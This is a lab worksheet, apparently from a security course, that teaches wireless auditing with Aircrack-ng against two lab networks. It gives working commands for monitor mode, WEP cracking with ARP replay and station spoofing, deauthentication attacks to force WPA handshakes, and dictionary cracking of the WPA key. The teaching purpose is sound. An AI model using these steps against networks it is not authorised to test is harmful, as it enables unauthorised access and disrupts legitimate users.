IMPORTANT!: Gaining access to networks without permission is considered an illegal act or crime in most countries. Know the law and obey.
Aircrack-ng is a set of tools for auditing wireless networks. The goal of these exercises is to introduce some of their capabilities. The man pages are very thorough and are more than enough to complete the exercises without “cheating”. You are encouraged to find the solutions in the man pages. Please pay attention to the large variety of features the toolset offers as we will only be able to cover a tiny fraction.
You will need to be root to use most of these utilities.
Use airodump-ng to find our targets’ BSSIDs, channels, and security settings given their ESSIDs: seccon_wep and seccon_wpa. Make note of these details, you will need them later. Stop the process when you are done.
In order to sniff a wireless network, the adapter needs to be put into monitor mode. Some processes may interfere with the adapter while in monitor mode.
airmon-ng check
List the processes that may interfere. It is best to kill those in normal testing. Do not kill any processes for this lab (e.g. dhclient & wpa_supplicant).
airmon-ng check kill
This command would kill potentially interfering processes, but don’t use it for this lab.
Put the wireless interface wlan0 in monitor mode. A new interface wlan0mon0 will be created. Automatically correct any errors noted.
airmon-ng start wlan0
Use airodump-ng. Note: “Copy” might be broken for this command, as the double-dashes don’t get copied properly.
airodump-ng –essid seccon_wep –essid seccon_wpa wlan0mon
Run airodump-ng to start capturing packets on the target network utilizing WEP. Let this capture continue.
airodump-ng --write $output_cap_file --channel $target_channel --bssid $target_bssid wlan0mon
Use aircrack-ng PTW (Pyshkin, Tews, Weinmann) method to crack the WEP PSK.
# -a 1 specifies we are cracking WEP aircrack-ng -a 1 [-b $target_bssid] $capture_file
Anywhere from 20k-60k IVs will be needed. Use aireplay-ng to spoof an associated station and replay ARP frames to increase the data rate.
# -3 indicates replay ARP frames aireplay-ng -3 -b $target_bssid -h $spoofed_station_mac wlan0mon
Use airodump-ng to capture a WPA handshake corresponding to a target network.
# Wait until the WPA handshake appears in the top line. airodump-ng --write $output_cap_file --channel $target_channel --bssid $target_bssid wlan0mon
If the handshake doesn’t reveal itself passively, use aireplay-ng to deauthenticate an associated station. This will force a handshake to occur.
# -0 1 indicates send one set of deauth packets aireplay-ng -0 1 -a $target_bssid -c $authed_station_mac wlan0mon
Use aircrack-ng to find the WPA PSK using the dictionary /usr/share/wordlists/fasttrack.txt.
# -a 2 specifies we are looking for a WPA handshake aircrack-ng -a 2 [-b $target_bssid] -w /usr/share/wordlists/fasttrack.txt $handshake_capture_file